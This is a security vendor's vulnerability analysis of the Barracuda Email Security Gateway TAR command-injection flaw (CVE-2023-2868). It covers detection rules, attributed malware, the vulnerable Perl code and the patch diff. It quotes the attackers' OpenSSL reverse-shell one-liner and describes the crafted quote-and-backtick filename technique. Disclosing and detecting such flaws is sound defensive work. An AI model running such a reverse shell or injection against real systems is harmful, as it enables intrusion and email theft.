【Whitepaper】Cyber Threats against Taiwan’s 2024 Presidential Election
Threat Intelligence

CVE-2023-2868: Barracuda Email Security Gateway Vulnerability

2023.08.16Cyber Threat Intelligence
The following blog post is based on our June H1 Vulnerability Insights Report. TeamT5 Vulnerability Research Team is dedicated to providing timely mitigation and response guidelines to critical vulnerabilities. Contact us for more information about our vulnerability intelligence.

CVE-2023-2868: Barracuda Email Security Gateway Vulnerability

CVE-2023-2868 is a command injection vulnerability in Barracuda Email Security Gateway (ESG).[1] The Barracuda ESG serves as both an email management platform and gateway to filter potential malicious emails. If the vulnerability exists, the threat actors can exploit CVE-2023-2868 to compromise Barracuda ESG, retrieving targets' email record and content. In this blog post, we will provide a comprehensive analysis on CVE-2023-2868 with mitigation guidelines.

Executive Summary

We assess the severity level of CVE-2023-2868 as critical and urge our customers to use this report to mitigate the effects. First, our technical analysis suggests that threat actors can inject malicious reverse shell command to Barracuda ESG by sending email with crafted TAR files. Second, a broad series of Barracuda ESG are affected by CVE-2023-2868, from version of 2014 to date. Last, public research suggests that there are more than fifty thousand devices using Barracuda ESG are exposed to the vulnerability.
Barracuda confirmed and released the IOCs of attacks against the ESG exploiting CVE-2023-2868. Further research shows that the attacks were launched by China-nexus UNC4841[2], and can be traced back to at least October 2022. The targets include U.S. government entities, Chinese IT firms, Research institutes in Taiwan, and Pakistani Banks. The threat actors have deployed at least three malware in the attacks: QuitTunnel (aka SALTWATER), SEASPY, SEASIDE. We summarize the information in the Possible Attack Scenario.
Based on the IOCs, TeamT5 prepares a comprehensive Mitigation and Response Advisory for our customers. Even though you have already patched the vulnerability, we still strongly recommend our customers use the detection tools we provided below to detect if CVE-2023-2868 has been exploited by threat actors before.
The Mitigation and Response Advisory covers:
  • Official Patch Information
  • Detection tools for checking if CVE-2023-2868 is exploited by threat actors:
    • YARA rule detecting if your Barracuda ESG has been exploited with CVE-2023-2868.
    • Barracuda official SNORT rules detecting threat actors’ attack attempt with SEASPY.

Affected Product

Barracuda ESG -

Mitigation and Response Advisory

1. Official Patch Information

Your Barracuda ESG is vulnerable to CVE-2023-2868 if the version is between -

2. Detection tools for checking if CVE-2023-2868 is exploited by threat actors

The threat actors can exploit CVE-2023-2868 via crafted TAR files. Our customers can deploy the following YARA rule to detect malicious TAR files in mail receivers' PC. The detected TAR files in receivers' mailbox suggest that your Barracuda ESG has been exploited with CVE-2023-2868.

YARA rule

The threat actors can exploit CVE-2023-2868 via crafted TAR files. Our customers can deploy the following YARA rule to detect malicious TAR files in mail receivers' PC. The detected TAR files in receivers' mailbox suggest that your Barracuda ESG has been exploited with CVE-2023-2868.
rule CVE_2023_2868_TAR_Exploit
        description = "Detect for TAR archive with single quote/backtick as start of filename of enclosed files. CVE-2023-2868"
        date_created = "2023-05-26"
        date_modified = "2023-06-09"
        sha256 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
        component = "vulnerability"

        $ustar =  { 75 73 74 61 72 }

        filesize < 1MB and uint32(257) == 0x61747375 and for any i in (0 .. #ustar) : (uint16(@ustar[i] + 255) == 0x6027)


Barracuda provides four official SNORT rules detecting threat actors’ attack attempt with SEASPY.
alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY"; flags:S; dsize:>9; content:"oXmp"; offset:0; depth:4; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1;)
The following SNORT rules required Suricata 5.0.4 or newer
alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY_1358"; flags:S; tcp.hdr; content:"|05 4e|"; offset:22; depth:2; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1;)

alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY_58928"; flags:S; tcp.hdr; content:"|e6 30|"; offset:28; depth:2; byte_test:4,>,16777216,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000002; rev:1;)

alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY_58930"; flags:S; tcp.hdr; content:"|e6 32|"; offset:28; depth:2; byte_test:4,>,16777216,0,big,relative; byte_test:2,>,0,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000003; rev:1;)

Possible Attack Scenario

Threat actors have exploited CVE-2023-2868 in Barracuda ESG, as confirmed by Barracuda in the mitigation advisory. Further research shows that the attacks were launched by China-nexus UNC4841, and can be traced back to at least October 2022. The threat actors have deployed at least three malware in the attacks: QuitTunnel (aka SALTWATER), SEASPY, SEASIDE. The targets are worldwide, including government entities in the U.S. and Japan, financial institutes in Pakistan, Research institutes in Taiwan, and IT firms in China. Notably, one of the Chinese IT firms is an email service provider with clients in Taiwan's IT and financial sectors. We have summarized the IOCs in Appendix III: Indicators of Compromise.
We have found and validated a public disclosure exploiting CVE-2023-2868. TeamT5 Vulnerability Intelligence Team has depicted the Possible Attack Scenario based on the information with high confidence.
First, the threat actors will identify the potential targets using Barracuda ESG vulnerable to CVE-2023-2868. Then, the threat actor will send an email to the target attached with a TAR file. Once processing the TAR file, Barracuda ESG will examine the emails and unpack the TAR file. A TAR file is a compressed file. If the filename inside the TAR file starts with a single quotation mark and backtick, it will result in the exploitation of CVE-2023-2868, leading to command injection. The technical detail is described in Appedix IV: Technical Analysis
Example of malicious TAR file starting with '`
Once executed, the TAR file will be decoded with base64, and abused through OpenSSL to establish the encrypted reverse shell, setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect >/tmp/p 2>/dev/null;rm /tmp/p"%. The threat actors can then further deploy malware to establish persistence in target’s environment. Furthermore, threat actors can also build proxy via malware, such as QuitTunnel in the cases, to move laterally and infect the internal mail server.
If the threat actors compromised Barracuda ESG, they can obtain the email history and content that passes through the ESG. Note that Barracuda ESG is a relatively closed system. General customers might require a professional Compromise Assessments (CA) or Incident Response (IR) Team to understand the situation. The Compromise assessments can identify ongoing or past malicious activity. The Incident Response services can identify the root cause of the malicious campaign.
Our partners and clients could contact TeamT5 to discuss customized countermeasures. TeamT5 is willing to provide technical support and help with the investigation.

Appendix I: More about CVE-2023-2868

Below table is an excerpt of our new series, *Patch Management Report (PMR). Published every two weeks (or more), the PMR provides our customers with concise yet comprehensive updates on the most critical and exploitable vulnerabilities selected by TeamT5 vulnerability research team during the period. Each vulnerability will be provided with patch information. If you are interested in subscribing to this new report series, please contact TeamT5 for more information.*


CVEVendorCVSSDescriptionThreat LevelDatePatchReference
BarracudaEmail Security Gateway
Barracuda Email Security Gateway (ESG) appliance contains an improper input validation vulnerability of a user-supplied .tar file, leading to remote command injection.A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances.
DetailsApply updates per vendor instructions.
DetailsNVD JSON: https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2023-2868?addOns=dictionaryCpes&apiKey=9aa5b4ca-4525-481b-954d-47dec39f6f19
MISC: https://status.barracuda.com/incidents/34kx82j5n4q9 (

Vendor Advisory)
MISC: https://www.barracuda.com/company/legal/esg-vulnerability (#Mitigation #Vendor Advisory)

Appendix II: Malware Table

NameTypeDescriptionAttributionFirst Seen
QuitTunnelRATQuitTunnel as known as SALTWATER is an x64 ELF RAT, and its protocol with C2 starts with "quit\r\n", so TeamT5 calls it QuitTunnel.Besides, QuitTunnel was firstly implanted in Barracuda Email Security Gateway with proxy functionarities such as DownloadChannel, UploadChannel, ProxyChannel, ShellChannel, and TunnelArgs for lateral movment.Unknown2023.05
SEASPYRATSEASPY is an x64 ELF persistence RAT that poses as a legitimate Barracuda Networks service and establishes itself as a PCAP filter, specifically monitoring traffic on port 25 (SMTP) and port 587. SEASPY contains backdoor functionality that is activated by a "magic packet" such as "oXmp".Unknown2023.05
SEASIDERATSEASIDE is a Lua based module for the Barracuda SMTP daemon (bsmtpd) that monitors SMTP HELO/EHLO commands to receive a command and control (C2) IP address and port which it passes as arguments to an external binary that establishes a reverse shell.Unknown2023.05

Appendix III: Indicators of Compromise (IOCs)

Malware samples exploiting CVE-2023-2868

Appendix IV: Technical Analysis

  • Decrypt the root file system
To understand the root cause of CVE-2023-2868, we need to jailbreak the Barracuda virtual image to obtain files. However, most of file system in Barracuda virtual image are encrypted via LUKS (Linux Unified Key Setup) and the initial ram file system (initramfs.img) is also encrypted. Instead, we reversed the kernel image (kernel.img) and found that the initramfs.img is decrypted in AES algorithm during boot. As a result, we can use QEMU to emulate kernel.img and initramfs.img[3] to dump the root file system in plaintext from memory via GDB utility. vulnerability-insight-cve-2023-2868-barracuda-email-security-gateway_pic1.png
After unpacking the root file system, we can find the LUKS keys in/etc/cryptsetup folder
  • Root Cause Analysis
After reviewing the Perl scripts, we identified the vulnerable Perl scripts: amavisd[4] that used for detecting virus and spam by Barracuda ESG. The amavisd contains a command injection vulnerability during unpacking TAR file in mail attachment.
The vulnerable Perl script is shown as follows: The do_tar() procedure uses qx() to execute command, and the file path ($f) which may lead to arbitrary code execution. Besides, according to the tag: BNSF-19979 in script for improving performance for TAR file attachments, the command injection vulnerability may have existed since version was released in 2014.[5]
    # This is amavisd-new.
    # It is a high-performance interface between message transfer agent (MTA)
    # and virus scanners and/or spam scanners.`

    sub decompose_part($$$) {
        my($part,$tempdir,$file_generator_object) = @_;

        my($filename) = "$tempdir/parts/$part";
        my($filetype) = $file_generator_object->file_type_long($part);
        my($ty)       = $file_generator_object->file_type($part);
        my($rfilename)= $file_generator_object->map_rfilename_to_parts($part);
        do_log(4, "decompose_part: $part $filetype $filename $rfilename ($ty)");

        # possible return values from eval:
        # 0 - truly atomic, unknown or archiver failure; consider atomic
        # 1 - some archiver format, successfully unpacked, result replaces original
        # 2 - probably unpacked, but keep the original (eg self-extracting archive)
        my($sts) = eval {
            return 0  if !defined($ty);  # consider atomic if unknown
            local($_) = $ty;
            /^\.gz$/   && return do_gunzip($part,$tempdir);  # fallback
            /^\.tar$/  && return do_tar($part,$tempdir);                # ====> Vulnerable function
            /^\.zip$/  && return do_unzip($part,0,$tempdir);
            /^\.rar$/  && return do_unrar($part,0,$tempdir);
            /^\.lha$/  && return do_lha($part,0,$tempdir);
            /^\.arc$/  && return do_arc($part,$tempdir);
            /^\.arj$/  && return do_unarj($part,$tempdir);
            /^\.zoo$/  && return do_zoo($part,$tempdir);
            /^\.7z$/  && return do_p7zip($part,$tempdir);
            /^\.tnef$/ && return do_tnef($part,$tempdir);
            /^\.exe$/  && return do_executable($part,$tempdir);
            /^\.pdf$/  && $attachment_regex_defined && return do_pdf($part,$tempdir);
            /^\.doc$/  && $attachment_regex_defined && return do_antiword($part,$tempdir);
            /^\.docx$/  && $attachment_regex_defined && return do_docx($part,$tempdir);
            /^\.xlsx$/  && $attachment_regex_defined && return do_xlsx($part,$tempdir);
            /^\.pptx$/  && $attachment_regex_defined && return do_pptx($part,$tempdir);
    # untar any tar archives with '/bin/tar'
    # extract each file individually
    # BNSF-19979 Switched to /bin/tar instead of Archive::Tar
    sub do_tar($$) {
        my($part,$tempdir) = @_;
        my $tarexec = '/bin/tar';

        unless (-x $tarexec) {
            chomp($@); do_log(4, "Tar unavailable! Could not extract $part");
            return 0;

        do_log(4,"Untarring $part");
        my @files = split(/\n/,qx{$tarexec -tf $tempdir/parts/$part});
        foreach my $f (@files) {
            next  if ($f =~ /\/$/); #ignore directories
            my $content = qx{$tarexec -O -xf $tempdir/parts/$part '$f'}; # ===> $f can be exploited via command injection 
            if ($content) {
                my $newpart = getfilename();
                setfilename($newpart, $f);
  • Patch Analysis
Barracuda have deployed automated security patch to fix the command injection in end of May 2023. The patch diff is shown as follows. The patch code replaces dangerous qx() functions with run_command() that developed by Barracuda.
--- amavisd.BNSF-36451  2021-04-19 13:56:58.322815675 -0700
+++ amavisd     2023-06-11 22:01:52.321732072 -0700
@@ -5152,7 +5152,15 @@
     my @files = split(/\n/,qx{$tarexec -tf $tempdir/parts/$part});
     foreach my $f (@files) {
         next  if ($f =~ /\/$/); #ignore directories
-        my $content = qx{$tarexec -O -xf $tempdir/parts/$part '$f'};
+        my($proc_fh) = run_command(undef,undef, $tarexec, qw(-O -xf),
+            "$tempdir/parts/$part", "--", "$f");
+        my($output) = '';
+        while( defined($_ = $proc_fh->getline) ) { $output .= $_ }
+        my($err); $proc_fh->close or $err=$!; my($retval) = retcode($?);
+        my $content = undef;
+        if ($output ne '') {
+            $content = $output;
+        }
         if ($content) {
             my $newpart = getfilename();
             setfilename($newpart, $f);


1.Barracuda Networks is a company providing security, networking and storage products based on network appliances and cloud services. https://www.barracuda.com/
3.$ qemu-system-x86_64 -S -s -kernel ./kernel.img -initrd ./initramfs.img -nographic -append "console=ttyS0 decrypt_initrd" -m 1024 vulnerability-insight-cve-2023-2868-barracuda-email-security-gateway_pic3.png
2023.08.16Cyber Threat Intelligence

Related Post

We use cookies to provide you with the best user experience. By continuing to use this website, you agree to ourPrivacy & Cookies Policy.